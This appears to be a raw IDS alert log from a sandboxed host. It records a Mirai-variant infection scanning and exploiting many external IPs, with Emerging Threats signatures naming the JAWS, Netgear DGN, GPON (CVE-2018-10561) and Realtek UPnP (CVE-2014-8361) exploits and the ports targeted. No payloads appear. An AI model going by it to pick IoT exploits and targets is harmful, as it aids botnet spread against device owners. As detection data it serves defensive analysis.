                                                              2024-12-11T00:43:40.336299+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233277271.6.68.1680TCP
                                                              2024-12-11T00:43:40.338484+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234750635.231.190.14149152TCP
                                                              2024-12-11T00:43:40.345769+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2351964105.19.219.19380TCP
                                                              2024-12-11T00:43:40.351573+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235173470.63.116.10849152TCP
                                                              2024-12-11T00:43:40.354120+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235848853.63.73.1845555TCP
                                                              2024-12-11T00:43:40.357800+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234238675.12.144.23480TCP
                                                              2024-12-11T00:43:40.366481+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355748183.56.155.1280TCP
                                                              2024-12-11T00:43:40.370117+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233532414.152.145.258080TCP
                                                              2024-12-11T00:43:40.372668+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235429235.253.237.2108080TCP
                                                              2024-12-11T00:43:40.492413+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2357176136.96.254.1548080TCP
                                                              2024-12-11T00:43:40.664229+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2350662114.65.149.15480TCP
                                                              2024-12-11T00:43:40.711303+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2349524201.192.233.880TCP
                                                              2024-12-11T00:43:40.833324+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338704185.162.133.998080TCP
                                                              2024-12-11T00:43:40.851887+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235710096.141.159.1018080TCP
                                                              2024-12-11T00:43:40.867327+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2334954150.213.241.2018080TCP
                                                              2024-12-11T00:43:41.286156+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233523496.192.248.2485555TCP
                                                              2024-12-11T00:43:41.296669+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335670179.153.43.1358080TCP
                                                              2024-12-11T00:43:41.332175+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354682148.45.107.1047574TCP
                                                              2024-12-11T00:43:41.332544+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2339918210.65.241.9652869TCP
                                                              2024-12-11T00:43:41.339773+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344078132.209.72.1538080TCP
                                                              2024-12-11T00:43:41.344148+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2349020188.31.96.5052869TCP
                                                              2024-12-11T00:43:41.349593+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235384017.237.133.807574TCP
                                                              2024-12-11T00:43:41.349960+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347910150.16.224.527574TCP
                                                              2024-12-11T00:43:41.350329+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2341928195.18.48.580TCP
                                                              2024-12-11T00:43:41.350699+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2343248179.107.147.2248080TCP
                                                              2024-12-11T00:43:41.351067+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235937859.202.247.2057574TCP
                                                              2024-12-11T00:43:41.355773+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23589806.99.173.445555TCP
                                                              2024-12-11T00:43:41.356511+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333444154.118.149.4449152TCP
                                                              2024-12-11T00:43:41.360657+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353558106.230.24.18549152TCP
                                                              2024-12-11T00:43:41.375859+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345838123.77.40.2298080TCP
                                                              2024-12-11T00:43:41.386346+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347778170.118.4.358080TCP
                                                              2024-12-11T00:43:41.742360+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2337984173.227.189.9580TCP
                                                              2024-12-11T00:43:41.742653+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234752457.237.49.2258080TCP
                                                              2024-12-11T00:43:41.836273+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234844419.230.61.21280TCP
                                                              2024-12-11T00:43:41.836370+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2350092141.55.34.2180TCP
                                                              2024-12-11T00:43:41.898721+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2336858142.20.61.2380TCP
                                                              2024-12-11T00:43:42.280808+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336894166.67.117.18980TCP
                                                              2024-12-11T00:43:42.280808+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336894166.67.117.18980TCP
                                                              2024-12-11T00:43:42.282179+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236019212.150.38.11249152TCP
                                                              2024-12-11T00:43:42.300772+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234683461.183.117.2017574TCP
                                                              2024-12-11T00:43:42.301494+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336248136.95.87.497574TCP
                                                              2024-12-11T00:43:42.301856+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234577662.197.147.8580TCP
                                                              2024-12-11T00:43:42.301856+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234577662.197.147.8580TCP
                                                              2024-12-11T00:43:42.302219+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338884203.168.46.14849152TCP
                                                              2024-12-11T00:43:42.366092+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233501621.54.197.19952869TCP
                                                              2024-12-11T00:43:42.492822+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2335546179.33.8.258080TCP
                                                              2024-12-11T00:43:42.523770+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2340240219.82.14.20980TCP
                                                              2024-12-11T00:43:43.283344+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348468161.144.110.8249152TCP
                                                              2024-12-11T00:43:43.289507+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23588965.112.156.3280TCP
                                                              2024-12-11T00:43:43.289507+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23588965.112.156.3280TCP
                                                              2024-12-11T00:43:43.320023+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233882875.3.26.2008080TCP
                                                              2024-12-11T00:43:43.325833+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359574175.27.152.19880TCP
                                                              2024-12-11T00:43:43.337086+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356980203.147.168.9049152TCP
                                                              2024-12-11T00:43:43.341451+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2350440219.164.39.6752869TCP
                                                              2024-12-11T00:43:43.349803+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235211471.7.135.1707574TCP
                                                              2024-12-11T00:43:43.356689+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2357250128.2.171.7580TCP
                                                              2024-12-11T00:43:43.667397+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.23561643.50.46.1768080TCP
                                                              2024-12-11T00:43:43.695718+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233863027.124.53.20380TCP
                                                              2024-12-11T00:43:43.814850+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234459274.188.6.778080TCP
                                                              2024-12-11T00:43:43.814868+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2360620215.230.190.2168080TCP
                                                              2024-12-11T00:43:43.914200+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235873253.86.41.9980TCP
                                                              2024-12-11T00:43:44.285896+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235884679.57.139.2188080TCP
                                                              2024-12-11T00:43:44.302895+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349984117.188.135.2415555TCP
                                                              2024-12-11T00:43:44.322678+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356288163.199.121.380TCP
                                                              2024-12-11T00:43:44.323847+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234198496.245.28.14980TCP
                                                              2024-12-11T00:43:44.347334+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354326188.155.53.35555TCP
                                                              2024-12-11T00:43:44.350279+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23501861.47.253.1525555TCP
                                                              2024-12-11T00:43:44.350648+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233337233.141.149.1775555TCP
                                                              2024-12-11T00:43:44.372574+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336430118.200.202.18849152TCP
                                                              2024-12-11T00:43:44.373305+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344768196.77.36.23680TCP
                                                              2024-12-11T00:43:44.373305+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344768196.77.36.23680TCP
                                                              2024-12-11T00:43:44.384908+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2335660190.32.214.11980TCP
                                                              2024-12-11T00:43:44.388192+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334756131.92.123.178080TCP
                                                              2024-12-11T00:43:45.304338+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235397075.42.18.21680TCP
                                                              2024-12-11T00:43:45.304338+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235397075.42.18.21680TCP
                                                              2024-12-11T00:43:45.361865+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235939488.94.164.1395555TCP
                                                              2024-12-11T00:43:46.302564+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337708154.144.254.24280TCP
                                                              2024-12-11T00:43:46.303675+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234516495.174.31.16780TCP
                                                              2024-12-11T00:43:46.316744+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234292094.165.171.65555TCP
                                                              2024-12-11T00:43:46.331253+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339618117.15.127.1317574TCP
                                                              2024-12-11T00:43:46.345129+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2357512192.239.126.2218080TCP
                                                              2024-12-11T00:43:46.379987+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341850205.175.182.778080TCP
                                                              2024-12-11T00:43:46.384344+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334726214.252.221.2037574TCP
                                                              2024-12-11T00:43:46.384712+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235511884.156.8.8380TCP
                                                              2024-12-11T00:43:46.385820+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2337172213.222.234.1558080TCP
                                                              2024-12-11T00:43:47.285563+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351676163.114.7.6080TCP
                                                              2024-12-11T00:43:47.291715+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2339160110.71.190.2518080TCP
                                                              2024-12-11T00:43:47.315285+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235208099.140.176.257574TCP
                                                              2024-12-11T00:43:47.333164+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236012878.39.176.958080TCP
                                                              2024-12-11T00:43:47.362176+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233650411.240.129.25480TCP
                                                              2024-12-11T00:43:47.375262+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359172204.28.245.6080TCP
                                                              2024-12-11T00:43:47.375262+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359172204.28.245.6080TCP
                                                              2024-12-11T00:43:47.375630+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352098222.82.137.12449152TCP
                                                              2024-12-11T00:43:47.377826+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235468227.2.41.24280TCP
                                                              2024-12-11T00:43:47.378194+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353492165.84.76.2027574TCP
                                                              2024-12-11T00:43:47.378564+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340540208.6.208.1365555TCP
                                                              2024-12-11T00:43:47.379291+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233797099.197.110.967574TCP
                                                              2024-12-11T00:43:47.379667+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234337227.130.12.1680TCP
                                                              2024-12-11T00:43:47.380039+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342004180.145.130.5180TCP
                                                              2024-12-11T00:43:47.382960+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233305856.243.106.1198080TCP
                                                              2024-12-11T00:43:47.430470+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233462434.49.97.2158080TCP
                                                              2024-12-11T00:43:47.523871+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2359720104.87.39.738080TCP
                                                              2024-12-11T00:43:47.540140+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2355656115.15.94.5180TCP
                                                              2024-12-11T00:43:47.540220+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235864639.61.64.13880TCP
                                                              2024-12-11T00:43:47.540383+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.236082220.39.219.198080TCP
                                                              2024-12-11T00:43:48.283369+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360572206.80.60.18449152TCP
                                                              2024-12-11T00:43:48.289155+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2344612142.162.134.1838080TCP
                                                              2024-12-11T00:43:48.290623+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2337358152.54.31.24180TCP
                                                              2024-12-11T00:43:48.297496+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2346264163.129.106.16780TCP
                                                              2024-12-11T00:43:48.307994+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2358724201.229.9.3880TCP
                                                              2024-12-11T00:43:48.319787+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233388460.213.88.807574TCP
                                                              2024-12-11T00:43:48.320157+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2332946143.92.171.2388080TCP
                                                              2024-12-11T00:43:48.322712+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356222115.253.80.16949152TCP
                                                              2024-12-11T00:43:48.330321+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2356128174.156.182.298080TCP
                                                              2024-12-11T00:43:48.339396+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342566109.243.209.447574TCP
                                                              2024-12-11T00:43:48.361009+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235065286.216.243.1297574TCP
                                                              2024-12-11T00:43:48.377987+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355628178.22.168.2649152TCP
                                                              2024-12-11T00:43:48.445608+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233284416.222.179.12380TCP
                                                              2024-12-11T00:43:48.462567+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2356600177.244.168.8280TCP
                                                              2024-12-11T00:43:48.492517+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2351528172.218.152.1098080TCP
                                                              2024-12-11T00:43:49.285695+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335918153.25.192.827574TCP
                                                              2024-12-11T00:43:49.302433+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355360126.188.12.12680TCP
                                                              2024-12-11T00:43:49.328965+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233710446.170.61.758080TCP
                                                              2024-12-11T00:43:49.329339+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360386166.190.152.4280TCP
                                                              2024-12-11T00:43:49.329339+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360386166.190.152.4280TCP
                                                              2024-12-11T00:43:49.386160+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360148164.163.173.15449152TCP
                                                              2024-12-11T00:43:49.386645+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233647848.202.100.138080TCP
                                                              2024-12-11T00:43:49.386916+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23464203.124.127.18549152TCP
                                                              2024-12-11T00:43:49.900076+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2358746200.129.247.23352869TCP
                                                              2024-12-11T00:43:50.279743+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346258128.148.246.688080TCP
                                                              2024-12-11T00:43:50.286667+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341916126.151.72.1195555TCP
                                                              2024-12-11T00:43:50.289944+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2346254184.138.242.1058080TCP
                                                              2024-12-11T00:43:50.300102+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233659650.110.115.308080TCP
                                                              2024-12-11T00:43:50.307025+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336082186.43.106.24080TCP
                                                              2024-12-11T00:43:50.307025+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336082186.43.106.24080TCP
                                                              2024-12-11T00:43:50.317648+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234989441.133.186.11752869TCP
                                                              2024-12-11T00:43:50.359743+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356938125.216.231.23980TCP
                                                              2024-12-11T00:43:50.359743+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356938125.216.231.23980TCP
                                                              2024-12-11T00:43:50.367007+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234577230.60.58.1838080TCP
                                                              2024-12-11T00:43:50.383779+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353432156.42.96.2475555TCP
                                                              2024-12-11T00:43:50.477295+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234514018.76.225.25480TCP
                                                              2024-12-11T00:43:50.493217+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235466660.224.26.528080TCP
                                                              2024-12-11T00:43:50.493454+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234105072.239.95.1888080TCP
                                                              2024-12-11T00:43:50.586342+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2353758179.118.33.8080TCP
                                                              2024-12-11T00:43:50.983947+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342970113.43.249.22849152TCP
                                                              2024-12-11T00:43:51.281280+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233395620.68.156.1588080TCP
                                                              2024-12-11T00:43:51.293449+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235194479.149.151.1880TCP
                                                              2024-12-11T00:43:51.296388+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337162191.46.111.11949152TCP
                                                              2024-12-11T00:43:51.296762+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235691458.68.44.8780TCP
                                                              2024-12-11T00:43:51.297133+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234029415.16.177.995555TCP
                                                              2024-12-11T00:43:51.300046+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345108114.23.158.9580TCP
                                                              2024-12-11T00:43:51.300046+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345108114.23.158.9580TCP
                                                              2024-12-11T00:43:51.315329+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233711036.251.164.1227574TCP
                                                              2024-12-11T00:43:51.315699+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233890074.187.153.2478080TCP
                                                              2024-12-11T00:43:51.319346+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360036121.2.173.427574TCP
                                                              2024-12-11T00:43:51.320086+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335814124.232.34.05555TCP
                                                              2024-12-11T00:43:51.333222+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234263050.103.241.25152869TCP
                                                              2024-12-11T00:43:51.343264+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335688130.4.44.24980TCP
                                                              2024-12-11T00:43:51.343264+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335688130.4.44.24980TCP
                                                              2024-12-11T00:43:51.347768+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.236040665.95.37.10652869TCP
                                                              2024-12-11T00:43:51.363732+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336814124.76.112.2108080TCP
                                                              2024-12-11T00:43:51.369560+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2332896211.188.253.14452869TCP
                                                              2024-12-11T00:43:51.430412+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2358964192.187.71.24780TCP
                                                              2024-12-11T00:43:51.445786+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2355748183.56.155.1280TCP
                                                              2024-12-11T00:43:51.461504+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233532414.152.145.258080TCP
                                                              2024-12-11T00:43:51.539644+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2337322137.128.167.608080TCP
                                                              2024-12-11T00:43:51.783919+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235491618.171.155.3052869TCP
                                                              2024-12-11T00:43:51.847899+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235300446.201.228.768080TCP
                                                              2024-12-11T00:43:52.283546+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350626105.87.20.198080TCP
                                                              2024-12-11T00:43:52.291144+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353770128.132.200.767574TCP
                                                              2024-12-11T00:43:52.291520+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358920214.208.107.1135555TCP
                                                              2024-12-11T00:43:52.311957+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234301413.238.239.23549152TCP
                                                              2024-12-11T00:43:52.316549+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360082139.233.195.2198080TCP
                                                              2024-12-11T00:43:52.326707+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2343266120.94.179.488080TCP
                                                              2024-12-11T00:43:52.335743+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344398182.52.150.1267574TCP
                                                              2024-12-11T00:43:52.341924+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2349486208.115.154.7052869TCP
                                                              2024-12-11T00:43:52.359503+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336336120.228.91.1267574TCP
                                                              2024-12-11T00:43:52.380181+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333408126.196.147.4749152TCP
                                                              2024-12-11T00:43:52.380923+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2351024125.170.236.15952869TCP
                                                              2024-12-11T00:43:52.415388+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2344078132.209.72.1538080TCP
                                                              2024-12-11T00:43:52.461566+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2345838123.77.40.2298080TCP
                                                              2024-12-11T00:43:52.461978+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2347778170.118.4.358080TCP
                                                              2024-12-11T00:43:52.492723+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2335670179.153.43.1358080TCP
                                                              2024-12-11T00:43:53.303360+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357996163.142.85.497574TCP
                                                              2024-12-11T00:43:53.309526+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2348686144.7.7.9952869TCP
                                                              2024-12-11T00:43:53.310248+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233637642.123.190.338080TCP
                                                              2024-12-11T00:43:53.312786+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234425283.231.181.23249152TCP
                                                              2024-12-11T00:43:53.329177+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338378133.132.31.12149152TCP
                                                              2024-12-11T00:43:53.336484+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235603837.139.68.708080TCP
                                                              2024-12-11T00:43:53.336855+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235303679.217.50.16452869TCP
                                                              2024-12-11T00:43:53.337951+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350968220.157.125.17849152TCP
                                                              2024-12-11T00:43:53.343809+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23544645.127.178.19749152TCP
